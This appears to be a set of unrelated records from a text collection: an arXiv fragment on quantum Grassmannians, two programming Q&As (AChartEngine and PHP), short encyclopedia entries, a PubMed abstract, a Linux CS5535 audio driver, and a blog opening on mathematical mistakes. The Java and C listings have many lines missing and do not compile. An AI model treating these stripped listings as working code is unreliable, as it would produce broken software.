{\rm in}_\prec \, \varphi ( \gamma^{(c)}) \,$ lifts to a polynomial which vanishes on $Z_{\alpha^{(a)}/\beta^{(b)}}$, as shown in the proof Theorem \[thm:syzygy\].
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
Applications and future directions
We first summarize some algebraic consequences of our main results.
\[ASL\] The coordinate ring of the quantum Grassmannian $K^q_{p,m}$ is an algebra with straightening law on the distributive lattice $C^q_{p,m}$. It has a presentation by a non-commutative Gröbner basis consisting of quadratic elements, and, in particular, it is a Koszul algebra.
[**Proof.**]{} The first statement follows from Theorem \[issagbi\] and the form of the syzygies $S(\gamma^{(c)},\delta^{(d)})$ of Theorem \[thm:gbasis\]. For the second statement, consider the coordinate ring of $K^q_{p,m}$ as the quotient of the free associative algebra on $C^q_{p,m}$ modulo a two-sided ideal. By [@EPS Proposition 3.2] that two-sided ideal has a quadratic Gröbner basis, obtained from lifting the Gröbner basis in Theorem \[thm:gbasis\]. For the classical Grassmannian $(n=0)$ this result appeared in [@Gr_Hu]. The Koszul property is a well-known consequence of the existence of a quadratic Gröbner basis; see e.g. [@Gr_Hu Theorem 3] for the non-commutative version which is relevant here.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
\[C-MG\] The coordinate ring of $K^q_{p,m}$ is a normal Cohen-Macaulay and Gorenstein domain. It has rational singularities if ${\rm char}(k) = 0$ and it is $F$-rational if ${\rm char}(k) > 0$.
[**Proof.** ]{} By Corollary \[ASL\] and the results of [@CHV], these properties of $K^q_{p,m}$ follow from the corresponding properties of the toric variety $T^q_{p,m}$. But these were established in [@Wagner], as $T^q_{p,m}$ is the toric variety associated to the distributive lattice ${\mathcal C}^q_{p,m}$.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
We remark that both Corollary \[C-MG\] and the analog of Corollary \[ASL\] (with the poset ${\mathcal C}^q_{p,m}$ replaced by the appropriate interval) hold for the skew quantum Schubert varieties.
Our next application is the sagbi property of the row-consecutive $p \times p$-minors of a matrix of indeterminates. This result is non-trivial since the set of [*all*]{} $p\times p$-minors is not a sagbi basis in general [@Sturmfels_GBCP Example 11.3]. A finite sagbi basis for the algebra of all $p \times p$-minors was found by Bruns and Conca [@Bruns_Conca]. Let ${\mathcal L}$ be the $p(n+1)\times(m+p)$-matrix whose $i,j$th entry is $x^{(l)}_{r,j}$, where $i=pl+r$. This matrix is obtained from ${\mathcal N}$ by stacking the matrices ${\mathcal N}_0, \ldots, {\mathcal N}_n$. Let $\chi:k[{\mathcal C}^{np}_{p,m}]\rightarrow k[X]$ denote the $k$-algebra homomorphism which sends the variable $\alpha^{(a)}$ to the $\alpha$th maximal minor of the submatrix of ${\mathcal L}$ consisting of rows $a+1,a+2,\ldots,a+p$. Thus the collection of polynomials $\chi(\alpha^{(a)})$ are the row-consecutive $p\times p$-minors of ${\mathcal L}$.
\[row-c-sagbi\] The set $\, \bigl\{ \chi(\alpha^{(a)}) \, : \, \alpha^{(a)} \in
{\mathcal C}^{np}_{p,m} \bigr\} \,$ of row-consecutive $p \times p$-minors of a generic matrix is a sagbi basis with respect to the degree reverse lexicographic term order $\prec$ on $k[X]$.
Brain Taylor has pointed out this may also be deduced from Proposition 2.7.3 of his Ph.D. Thesis [@BDT_thesis].
[**Proof.** ]{} Let $\omega$ be the weight on the variables in $k[X]$ defined by $\omega(x^{(l)}_{i,j}):= -(pl+i)^2$. Then $\chi(\alpha^{(a)}) = {\rm in}_\omega
\bigl( \varphi(\alpha^{(a)})\bigr)$, the initial form of $\varphi(\alpha^{(a)})$, and we have $\,{\rm in}_\prec \bigl( \chi(\alpha^{(a)}) \bigr) \,=
\, {\rm in}_\prec \bigl( \varphi(\alpha^{(a)}) \bigr) \,$ for all $\,\alpha^{(a)} \in {\mathcal C}^{np}_{p,m}$. Thus image($\varphi$) and image($\chi$) have the same initial algebra, and so we deduce the sagbi property for the polynomials $\chi(\alpha^{(a)})$ from Theorem \[issagbi\].
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
Let ${\bf w}$ denote the weight on the variables ${\mathcal C}^{np}_{p,m}$ defined by ${\bf w}(\alpha^{(a)}):=-a^2$. For every incomparable pair $\gamma^{(c)},\delta^{(d)}$ in the poset ${\mathcal C}^{np}_{p,m}$, we define the quadratic polynomial $$R(\gamma^{(c)},\delta^{(d)})\quad:=\quad
{\rm in}_{\bf w} \bigl( S(\gamma^{(c)},\delta^{(d)}) \bigr),$$ where $S(\gamma^{(c)},\delta^{(d)})$ is the element of the reduced Gröbner basis for the kernel of $\varphi$. For example, $\, R(156^{(1)},234^{(2)})\,$ equals the sum of the first ten terms in (\[BigSyzygy\]). The weight ${\bf w}$ is equivalent, modulo the homogeneities of $\,{\rm kernel}(\varphi)$, to the induced weight which was denoted by ${\mathcal A}^T \omega$ in [@Sturmfels_GBCP Chapter 11]. The only-if direction in [@Sturmfels_GBCP Theorem 11.4] implies
\[row-c-GB\] The reduced Gröbner basis of the kernel of $\chi$ consists of the quadratic polynomials $R(\gamma^{(c)},\delta^{(d)})$ as $\gamma^{(c)},\delta^{(d)}$ run over the set of incomparable pairs in the poset ${\mathcal C}^{np}_{p,m}$.
For the Plücker ideal defining the classical Grassmannian $(n=0)$, an explicit (but non-reduced) quadratic Gröbner basis is known. It appears in the work of Hodge-Pedoe [@Hodge_Pedoe] and Doubilet-Rota-Stein [@DRS], and it consists of the van der Waerden syzygies. They are discussed in Gröbner basis language in [@Sturmfels_invariant Section 3.1]. Our next aim is to introduce an analogous non-reduced Gröbner basis for the ideal $\, {\rm kernel}(\varphi)\,$ of the quantum Grassmannian.
We begin by defining the skew van der Waerden syzygies for its initial ideal $$\label{bfw}
\, {\rm kernel}(\chi)
\quad = \quad {\rm in}_{\bf w} ({\rm kernel}(\varphi)) ,$$ which consists of the algebraic relations among the row-consecutive minors. Given a sequence of integers $\,D\,: \, 1 \leq d_1 < \cdots < d_p \leq m+p$ and any integer $0\leq a\leq np$, let $D^{(a)}$ denote $\pm \alpha^{(a)}$, where $\alpha$ is the reordering of the sequence $D$ and $\pm$ is the sign of the permutation which sorts the sequence $D$. Let $T=\alpha^{(a)}\beta^{(b)}$ with $a<b$ be a non-standard tableau and $i$ the smallest index of a violation $\beta_i<\alpha_{i-b+a}$. Define increasing sequences $$\begin{array}{c}
A\quad:=\quad \alpha_1,\ldots,\alpha_{i-b+a-1}
\qquad B\quad:=\quad \beta_{i+1},\ldots,\beta_p\\
C\quad:=\quad \beta_1,\ldots,\beta_i,\alpha_{i-b+a},\ldots,\alpha_p.
\end{array}$$ For a subset $I\in\binom{[p+b-a+1]}{i}$, let $C_I$ be the corresponding numbers from $C$ (in order) and $C_{I^c}$ be the other numbers from $C$, also in order. Define the [*skew van der Waerden syzygy*]{} $$\label{eq:ElQuSy}
W(T) \quad:=\quad
(A, C_{I^c})^{(a)}\ \cdot (C_I,B)^{(b)}\ .$$
\[NonRedGB\] The syzygies $\, W(T) \,$ form a Gröbner basis for the kernel of $\chi$.
[**Proof.** ]{} Our choice of term order implies $\,{\rm in}_\prec \bigl( W(T) \bigr) =
T = \alpha^{(a)} \beta^{(b)}$. Therefore it suffices to show that $\chi(W(T))=0$. Let $Y_1,\ldots,Y_{m+p}$ be the columns of the submatrix of ${\mathcal L}$ given by its rows $a+1,\ldots,b+p$. The skew van der Waerden syzygy $\chi(W(T))$ is an anti-symmetric, multilinear form in the $p+b-a+1$ vectors $Y_{b_1},\ldots,Y_{b_{p+b-a+1}}$ in $(p+b-a)$-space.
(7.5,7.5)(0,0) ( 0, 0)[(1,0)[7.5]{}]{} ( 0,2.5)[(1,0)[7.5]{}]{} ( 0, 5)[(1,0)[7.5]{}]{} (2.5,7.5)[(1,0)[5]{}]{} ( 0, 0)[(0,1)[5]{}]{} (2.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)[(0,1)[7.5]{}]{} (7.5, 0)[(0,1)[7.5]{}]{} ( 5, 0)
The non-reduced Gröbner basis in Proposition \[NonRedGB\] can be lifted to the quantum Grassmannian as follows. We define the [*quantum van der Waerden syzygy*]{} of the non-standard tableau $T$ to be the unique quadratic polynomial $V(T)$ in ${\rm kernel}(\varphi)$ which satisfies $${\rm in}_{\bf w} \bigl( V(T) \bigr ) \quad = \quad
W(T),$$ and is a sum of syzygies $S(\gamma^{(c)},\delta^{(d)})$ with ${\bf w}(\gamma^{(c)}\delta^{(d)})={\bf w}(T)$. This syzygy exists by (\[bfw\]) and it is unique because the quadratic generators of the initial ideal are $k$-linearly independent, and any two such quadratic lifts of $W(T)$ in kernel$(\varphi)$ differ by terms whose weights are strictly less than ${\bf w}(T)$. For instance, the quantum van der Waerden syzygy $\, V(156^{(1)}234^{(2)})\,$ is the polynomial with $30$ terms given in (\[BigSyzygy\]). It would be desirable to find an explicit formula, perhaps in terms of the combinatorial formalism in [@DRS], for all of the skew van der Waerden syzygies $V(T)$, but at present we have no clue how to do this.
The ideal of the quantum Grassmannian $K^q_{p,m}$ contains certain [*obvious relations*]{} which are derived from the Grassmannian ${\it Grass}_pk^{m+p}$. For each $\alpha\in\binom{[m+p]}{p}$ consider the polynomial $$g_\alpha(t) \quad = \quad
\alpha^{(q)}\cdot t^q+ \cdots + \alpha^{(1)}\cdot t + \alpha^{(0)}\, .$$ Given any quadratic form $F(\alpha)$ in the Plücker ideal defining ${\it Grass}_pk^{m+p}$ and any $0\leq r \leq 2q$, let $F_r$ be the coefficient of $t^r$ in polynomial $F(g_\alpha(t))$. Since $F(g_\alpha(t))$ is a polynomial in $t$ which vanishes identically on $K^q_{p,m}$, each of its coefficients $F_r$ must also vanish on $K^q_{p,m}$. We call the collection of quadratic polynomials $F_r$ as $F$ ranges over a generating set for the Plücker ideal of ${\it Grass}_pk^{m+p}$ the [*obvious relations*]{}. Rosenthal [@Rosen94] showed the following.
The obvious relations define $K^q_{p,m}$ set-theoretically, provided $k$ is infinite.
When $p,m \leq 2$, the obvious relations coincide with the reduced Gröbner basis of Theorem \[thm:gbasis\], in particular, they generate the ideal of the quantum Grassmannian $K^q_{2,m}$. This is no longer true for $m=p=3$. There are 35 incomparable pairs in ${\mathcal C}^0_{3,3}$, and hence $35$ linearly independent quadrics in the Plücker ideal of ${\it Grass}_3k^6$. These give rise to $35(2q+1)$ linearly independent obvious relations but when $q>0$ there are $35(2q+1)+2q-1$ incomparable pairs in ${\mathcal C}^q_{3,3}$. Thus the obvious relations do not generate the homogeneous ideal of $K^q_{3,3}$.
When $q=1$ or $q=2$ then the obvious relations generate the homogeneous ideal of $K^q_{3,3}$ together with an embedded component supported on the irrelevant ideal. Thus the obvious relations define $K^q_{3,3}$ scheme-theoretically, but not ideal-theoretically. It remains an open problem whether the the obvious relations define $K^q_{p,m}$ scheme-theoretically.
Batyrev et.al. [@Batyrev] applied the familiar sagbi property for the Grassmannian in the construction of certain pairs of mirror 3-folds from Calabi-Yau complete intersections in Grassmannians. We are optimistic that the results in this paper will be similarly useful for researchers in the fascinating interplay of algebraic geometry and theoretical physics.
The classical straightening law for the Grassmannian and its Schubert varieties were the starting point for the general [*standard monomial theory*]{} for flag varieties. For details and references we refer to the recent work on sagbi bases by Gonciulea and Lakshmibai [@GL]. Our results suggest that standard monomial theory might be extended to certain spaces of rational curves in flag varieties generalizing the quantum Grassmannian $K^q_{p,m}$.
, [ *Conifold transitions and mirror symmetry for [C]{}alabi-[Y]{}au complete intersections in [G]{}rassmannians*]{}, Nuclear Physics B, 514 (1998), pp. 640–666.
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, [*KRS and powers of determinantal ideals*]{}, Compositio Mathematica, 111 (1998), pp. 111–122.
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, [*Sagbi bases with applications to blow-up algebras*]{}, J. reine angew. Math., 474 (1996), pp. 113–138.
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, [*Non-commutative [G]{}r[ö]{}bner bases for commutative algebras*]{}, Proc. Amer. Math. Soc., 126 (1998), pp. 687–691.
, [*Projective resolutions of straightening closed algebras generated by minors*]{}, Adv. Math., 110 (1995), pp. 314–333.
, [*Distributive lattices, affine semigroup rings and algebras with straightening laws*]{}, Advanced Studies in Pure Mathematics, Vol. 11, North-Holland, 1987, pp. 93–109.
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, [*Numerical [S]{}chubert calculus*]{}, J. Symb. Comp., 26 (1998), pp. 767–788.
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, [*Schubert varieties, toric varieties, and ladder determinantal varieties*]{}, Ann. Inst. Fourier (Grenoble) 47 (1997), pp. 1013–1064.
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, [*Real rational curves in [G]{}rassmannians*]{}. MSRI preprint \# 1999-025, math.AG/9904167.
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[^1]: Second author supported in part by NSF grant DMS-9796181. Research at MSRI supported in part by NSF grant DMS-9701755
| {
"pile_set_name": "ArXiv"
} |
Dynamically updated charts with Achartengine
I will like to have a chart in my application that the user can update when inserting data in an edit text. That is to say I want that when a user inserts data in the edit text and sent them with the send button the chart updates and shows the new data.
I tried inserting the new data into the arraylist in which data are saved and calling the repaint function but it doesn't work and I can't figure why.
This is my code.
Can someone help me, please?
public class ChartActivity extends Activity {
private GraphicalView mChartView;
XYMultipleSeriesRenderer renderer;
List<double[]> x= new ArrayList<double[]>();
List<double[]> values = new ArrayList<double[]>();
String[] titles = new String[] { "spens1" };
protected void onCreate(Bundle savedInstanceState) {
// TODO Auto-generated method stub
LinearLayout layout = (LinearLayout) findViewById(R.id.linearLayout2);
x.add(new double[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 });
// }
values.add(new double[] { 9, 10, 11, 15, 19, 23, 26, 25, 22, 18, 13,
10 });
int[] colors = new int[] { Color.BLUE };
PointStyle[] styles = new PointStyle[] { PointStyle.CIRCLE };
renderer = buildRenderer(colors, styles);
int length = renderer.getSeriesRendererCount();
for (int i = 0; i < length; i++) {
((XYSeriesRenderer) renderer.getSeriesRendererAt(i))
setChartSettings(renderer, "Ranges", "time",
"distance", 0.5, 12.5, -10, 40, Color.LTGRAY, Color.LTGRAY);
renderer.setPanLimits(new double[] { -10, 20, -10, 40 });
renderer.setZoomLimits(new double[] { -10, 20, -10, 40 });
if (mChartView == null) {
Log.d("Oncreate ", "if (mChartView == null)");
mChartView = ChartFactory.getLineChartView(this, mDataset(titles,
x, values), renderer);
layout.addView(mChartView, new LayoutParams(
LayoutParams.FILL_PARENT, LayoutParams.FILL_PARENT));
} else {
Log.d("Oncreate ", "if (mChartView != null)");
private final Handler mHandler = new Handler();
public void sendMessageChart(View view) {
private final Runnable mUpdateUITimerTask = new Runnable() {
public void run() {
EditText editText = (EditText) findViewById(R.id.edit_message_chart);
String message = editText.getText().toString();
double new_y = Double.parseDouble(message);
double[] x_val = new double[]{x.size()+1};
double[] y_val = new double[]{new_y};
mChartView = .repaint();
private void setChartSettings(XYMultipleSeriesRenderer renderer3,
String title, String xTitle, String yTitle, double xMin,
double xMax, double yMin, double yMax, int axesColor,
int labelsColor) {
// TODO Auto-generated method stub
private XYMultipleSeriesRenderer buildRenderer(int[] colors,
PointStyle[] styles) {
// TODO Auto-generated method stub
XYMultipleSeriesRenderer renderer = new XYMultipleSeriesRenderer();
setRenderer(renderer, colors, styles);
return renderer;
private void setRenderer(XYMultipleSeriesRenderer renderer2, int[] colors,
PointStyle[] styles) {
// TODO Auto-generated method stub
renderer2.setMargins(new int[] { 20, 30, 15, 20 });
int length = colors.length;
for (int i = 0; i < length; i++) {
XYSeriesRenderer r = new XYSeriesRenderer();
private XYMultipleSeriesDataset mDataset(String[] titles,
List<double[]> xValues, List<double[]> yValues) {
// TODO Auto-generated method stub
XYMultipleSeriesDataset dataset1 = new XYMultipleSeriesDataset();
addXYSeries(dataset1, titles, xValues, yValues, 0);
return dataset1;
private void addXYSeries(XYMultipleSeriesDataset dataset, String[] titles,
List<double[]> xValues, List<double[]> yValues, int scale) {
// TODO Auto-generated method stub
int length = titles.length;
for (int i = 0; i < length; i++) {
XYSeries series = new XYSeries(titles[i], scale);
double[] xV = xValues.get(i);
double[] yV = yValues.get(i);
int seriesLength = xV.length;
for (int k = 0; k < seriesLength; k++) {
series.add(xV[k], yV[k]);
The new data needs to be added to the XYSeries, not to a random ArrayList. See this code that does exactly what you need.
| {
"pile_set_name": "StackExchange"
} |
Adela cuprella
Adela cuprella is a moth of the Adelidae family and are found in most of Europe. It was first described by Michael Denis & Ignaz Schiffermüller in 1775 and the type locality is from Austria. They can be found flying around sallows (Salix) species during the day in April and May.
The wingspan is 14–17 mm. The forewings are bronzy metallic with a purplish sheen and towards costa purple-tinged. Hindwings are dark purplish-fuscous. The head in males is black, in female ferruginous, the face in females is hairy. Antennae in males is 2.5, white, towards the base blackish ringed; in females it is I.25 black and not thickened towards apex white.
Adults are active by day and are on wing from mid April to early May, flying around willows.
Life cycle
The moths are univoltine (i.e. one generation a year) and visit the flowers of sallows, usually high up. In some years, they can be numerous and in other years, scarce or absent. The females lay their eggs on the catkins of sallows. On hatching, the larvae drop to the ground and feed on dead leaf litter from a flat, portable case built from leaf fragments. The case is an elongate-oval shape with each half made of several, roughly crescentic pieces of dead sallow leaves. The larvae feed from May onwards and can overwinter two or three times. Pupation takes place within the case in March.
It is found in most of Europe, except Portugal, Slovenia and most of the Balkan Peninsula.
External links
British lepidoptera
Category:Moths described in 1775
Category:Moths of Europe
Category:Taxa named by Michael Denis
Category:Taxa named by Ignaz Schiffermüller | {
"pile_set_name": "Wikipedia (en)"
} |
From piecemeal to configurational representation of faces.
Unlike older children and adults, children of less than about 10 years of age remember photographs of faces presented upside down almost as well as those shown upright and are easily fooled by simple disguises. The development at age 10 of the ability to encode orientation-specific configurational aspects of a face may reflect completion of certain maturational changes in the right cerebral hemisphere. | {
"pile_set_name": "PubMed Abstracts"
} |
* Driver for audio on multifunction CS5535/6 companion device
* Copyright (C) Jaya Kumar
* Based on Jaroslav Kysela and Takashi Iwai's examples.
* This work was sponsored by CIS(M) Sdn Bhd.
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#include <linux/delay.h>
#include <linux/interrupt.h>
#include <linux/init.h>
#include <linux/pci.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/io.h>
#include <sound/core.h>
#include <sound/control.h>
#include <sound/pcm.h>
#include <sound/rawmidi.h>
#include <sound/ac97_codec.h>
#include <sound/initval.h>
#include <sound/asoundef.h>
#include "cs5535audio.h"
#define DRIVER_NAME "cs5535audio"
static char *ac97_quirk;
module_param(ac97_quirk, charp, 0444);
MODULE_PARM_DESC(ac97_quirk, "AC'97 board specific workarounds.");
static const struct ac97_quirk ac97_quirks[] = {
#if 0 /* Not yet confirmed if all 5536 boards are HP only */
.subvendor = PCI_VENDOR_ID_AMD,
.subdevice = PCI_DEVICE_ID_AMD_CS5536_AUDIO,
.name = "AMD RDK",
.type = AC97_TUNE_HP_ONLY
static int index[SNDRV_CARDS] = SNDRV_DEFAULT_IDX;
module_param_array(index, int, NULL, 0444);
MODULE_PARM_DESC(index, "Index value for " DRIVER_NAME);
module_param_array(id, charp, NULL, 0444);
module_param_array(enable, bool, NULL, 0444);
static const struct pci_device_id snd_cs5535audio_ids[] = {
MODULE_DEVICE_TABLE(pci, snd_cs5535audio_ids);
static void wait_till_cmd_acked(struct cs5535audio *cs5535au, unsigned long timeout)
unsigned int tmp;
do {
tmp = cs_readl(cs5535au, ACC_CODEC_CNTL);
if (!(tmp & CMD_NEW))
} while (--timeout);
if (!timeout)
"Failure writing to cs5535 codec\n");
static unsigned short snd_cs5535audio_codec_read(struct cs5535audio *cs5535au,
unsigned short reg)
unsigned int regdata;
unsigned int timeout;
unsigned int val;
regdata = ((unsigned int) reg) << 24;
regdata |= CMD_NEW;
cs_writel(cs5535au, ACC_CODEC_CNTL, regdata);
wait_till_cmd_acked(cs5535au, 50);
timeout = 50;
do {
val = cs_readl(cs5535au, ACC_CODEC_STATUS);
if ((val & STS_NEW) && reg == (val >> 24))
} while (--timeout);
if (!timeout)
"Failure reading codec reg 0x%x, Last value=0x%x\n",
reg, val);
return (unsigned short) val;
static void snd_cs5535audio_codec_write(struct cs5535audio *cs5535au,
unsigned short reg, unsigned short val)
unsigned int regdata;
regdata = ((unsigned int) reg) << 24;
regdata |= val;
regdata &= CMD_MASK;
regdata |= CMD_NEW;
cs_writel(cs5535au, ACC_CODEC_CNTL, regdata);
wait_till_cmd_acked(cs5535au, 50);
static void snd_cs5535audio_ac97_codec_write(struct snd_ac97 *ac97,
unsigned short reg, unsigned short val)
struct cs5535audio *cs5535au = ac97->private_data;
snd_cs5535audio_codec_write(cs5535au, reg, val);
static unsigned short snd_cs5535audio_ac97_codec_read(struct snd_ac97 *ac97,
unsigned short reg)
struct cs5535audio *cs5535au = ac97->private_data;
return snd_cs5535audio_codec_read(cs5535au, reg);
static int snd_cs5535audio_mixer(struct cs5535audio *cs5535au)
struct snd_card *card = cs5535au->card;
struct snd_ac97_bus *pbus;
struct snd_ac97_template ac97;
int err;
static struct snd_ac97_bus_ops ops = {
.write = snd_cs5535audio_ac97_codec_write,
.read = snd_cs5535audio_ac97_codec_read,
if ((err = snd_ac97_bus(card, 0, &ops, NULL, &pbus)) < 0)
return err;
memset(&ac97, 0, sizeof(ac97));
ac97.private_data = cs5535au;
ac97.pci = cs5535au->pci;
/* set any OLPC-specific scaps */
olpc_prequirks(card, &ac97);
if ((err = snd_ac97_mixer(pbus, &ac97, &cs5535au->ac97)) < 0) {
dev_err(card->dev, "mixer failed\n");
return err;
snd_ac97_tune_hardware(cs5535au->ac97, ac97_quirks, ac97_quirk);
err = olpc_quirks(card, cs5535au->ac97);
if (err < 0) {
dev_err(card->dev, "olpc quirks failed\n");
return err;
return 0;
static void process_bm0_irq(struct cs5535audio *cs5535au)
u8 bm_stat;
bm_stat = cs_readb(cs5535au, ACC_BM0_STATUS);
if (bm_stat & EOP) {
struct cs5535audio_dma *dma;
dma = cs5535au->playback_substream->runtime->private_data;
} else {
"unexpected bm0 irq src, bm_stat=%x\n",
static void process_bm1_irq(struct cs5535audio *cs5535au)
u8 bm_stat;
bm_stat = cs_readb(cs5535au, ACC_BM1_STATUS);
if (bm_stat & EOP) {
struct cs5535audio_dma *dma;
dma = cs5535au->capture_substream->runtime->private_data;
static irqreturn_t snd_cs5535audio_interrupt(int irq, void *dev_id)
u16 acc_irq_stat;
unsigned char count;
struct cs5535audio *cs5535au = dev_id;
if (cs5535au == NULL)
return IRQ_NONE;
acc_irq_stat = cs_readw(cs5535au, ACC_IRQ_STATUS);
if (!acc_irq_stat)
return IRQ_NONE;
for (count = 0; count < 4; count++) {
if (acc_irq_stat & (1 << count)) {
switch (count) {
case IRQ_STS:
cs_readl(cs5535au, ACC_GPIO_STATUS);
case WU_IRQ_STS:
cs_readl(cs5535au, ACC_GPIO_STATUS);
case BM0_IRQ_STS:
case BM1_IRQ_STS:
"Unexpected irq src: 0x%x\n",
static int snd_cs5535audio_free(struct cs5535audio *cs5535au)
pci_set_power_state(cs5535au->pci, PCI_D3hot);
if (cs5535au->irq >= 0)
free_irq(cs5535au->irq, cs5535au);
return 0;
static int snd_cs5535audio_dev_free(struct snd_device *device)
struct cs5535audio *cs5535au = device->device_data;
return snd_cs5535audio_free(cs5535au);
static int snd_cs5535audio_create(struct snd_card *card,
struct pci_dev *pci,
struct cs5535audio **rcs5535au)
struct cs5535audio *cs5535au;
int err;
static struct snd_device_ops ops = {
.dev_free = snd_cs5535audio_dev_free,
*rcs5535au = NULL;
if ((err = pci_enable_device(pci)) < 0)
return err;
if (dma_set_mask(&pci->dev, DMA_BIT_MASK(32)) < 0 ||
dma_set_coherent_mask(&pci->dev, DMA_BIT_MASK(32)) < 0) {
dev_warn(card->dev, "unable to get 32bit dma\n");
err = -ENXIO;
goto pcifail;
cs5535au = kzalloc(sizeof(*cs5535au), GFP_KERNEL);
if (cs5535au == NULL) {
err = -ENOMEM;
goto pcifail;
cs5535au->card = card;
cs5535au->pci = pci;
cs5535au->irq = -1;
if ((err = pci_request_regions(pci, "CS5535 Audio")) < 0) {
goto pcifail;
cs5535au->port = pci_resource_start(pci, 0);
if (request_irq(pci->irq, snd_cs5535audio_interrupt,
dev_err(card->dev, "unable to grab IRQ %d\n", pci->irq);
err = -EBUSY;
goto sndfail;
cs5535au->irq = pci->irq;
if ((err = snd_device_new(card, SNDRV_DEV_LOWLEVEL,
cs5535au, &ops)) < 0)
goto sndfail;
*rcs5535au = cs5535au;
return 0;
sndfail: /* leave the device alive, just kill the snd */
return err;
return err;
static int snd_cs5535audio_probe(struct pci_dev *pci,
const struct pci_device_id *pci_id)
static int dev;
struct snd_card *card;
struct cs5535audio *cs5535au;
int err;
if (dev >= SNDRV_CARDS)
return -ENODEV;
if (!enable[dev]) {
return -ENOENT;
err = snd_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
0, &card);
if (err < 0)
return err;
if ((err = snd_cs5535audio_create(card, pci, &cs5535au)) < 0)
goto probefail_out;
card->private_data = cs5535au;
if ((err = snd_cs5535audio_mixer(cs5535au)) < 0)
goto probefail_out;
if ((err = snd_cs5535audio_pcm(cs5535au)) < 0)
goto probefail_out;
strcpy(card->driver, DRIVER_NAME);
strcpy(card->shortname, "CS5535 Audio");
sprintf(card->longname, "%s %s at 0x%lx, irq %i",
card->shortname, card->driver,
cs5535au->port, cs5535au->irq);
if ((err = snd_card_register(card)) < 0)
goto probefail_out;
pci_set_drvdata(pci, card);
return 0;
return err;
static void snd_cs5535audio_remove(struct pci_dev *pci)
static struct pci_driver cs5535audio_driver = {
.id_table = snd_cs5535audio_ids,
.probe = snd_cs5535audio_probe,
.remove = snd_cs5535audio_remove,
.driver = {
.pm = &snd_cs5535audio_pm,
MODULE_AUTHOR("Jaya Kumar");
| {
"pile_set_name": "Github"
} |
PHP object question
Excuse what is probably a really basic question but how do I achieve this.
$cache = New Mem;
Which is called via the function below. Without the ->delete, it works perfectly fine, but I just need to find a way to call the delete thus inside the function.
class Mem
function event($event)
global $pdo;
global $memcached;
$key = md5(sha1($event) . sha1('events'));
if ($this->delete)
return $memcached->delete($key);
return $memcached->get($key);
I hope that makes sense, sorry for my pseudo code basically for the delete part.
You're calling delete as if it were a method within your class - but you have no method called delete...Instead, you should evaluate the $event variable as I'm doing below and determine what action you'll take:
class Mem {
private $pdo;
private $memcached;
public function event($event) {
$key = md5(sha1($event) . sha1('events')); #from your original code
switch ($event) {
case "delete":
#do delete stuff
case "add":
#do add stuff
Update: Following additional questions in comments...
class Event {
private $key;
public function __construct($key) {
$this->key = $key;
public function delete($key) {
# do delete
| {
"pile_set_name": "StackExchange"
} |
Adapura, Koppal
Adapura (Kanakagiri) is a village in the Northern state of Karnataka, India. It is located in the Gangawati taluk of Koppal district in Karnataka.
The Word Adapura comes from the word Halapura (Flooding Milk). Natives are migrated from Bhogapura currently near to Sacred Bhogapureshwara Temple Near Navali, Taluk Gangavathi, Koppal District. Because of Flood, people migrated to many other places. One part of group reached to near Katagahalla (a stream), its looks like flowing milk (Halu in Kannada). People came from Bhogapura have resided south of Katagahalla called has Halapura (Flooding milk). when going on this Halapura has pronounced as Adapura.
The Village Adapura has a population of about 1400 (780 males and 620 females)
See also
Districts of Karnataka
External links
Category:Villages in Koppal district | {
"pile_set_name": "Wikipedia (en)"
} |
Major screwups in mathematics: example 1
Last month I asked for examples of major screwups in mathematics. Specifically, I was looking for cases in which some statement S was considered to be proved, and later turned out to be false. I could not think of any examples myself. Readers suggested several examples, and I got lucky and turned up one on my own. Some of the examples were rather obscure technical matters, where Professor Snorfus publishes in Acta Quandalia that all partially uniform k-quandles have the Cosell property, and this goes unchallenged for several years before one of the other three experts in partially uniform quandle theory notices that actually this is only true for Nemontovian k-quandles. I'm not going to report on matters that sounded like that to me, although I realize that I'm running the risk that all the examples that I do report will sound that way to most of the audience. But I'm going to give it a try. General remarks I would like to make some general remarks first, but I don't quite know yet what they are. Two readers independently suggested that I should read Proofs and Refutations by Imre Lakatos, and raised a number of interesting points that I'm sure I'd like to expand on, except that I haven't read the book. Both copies are checked out of the Penn library, which is a good sign, and the interlibrary loan copy I ordered won't be here for several days. Still, I can relate a partial secondhand understanding of the ideas, which seem worth repeating. Whether a result is "correct" may be largely a matter of definition. Consider 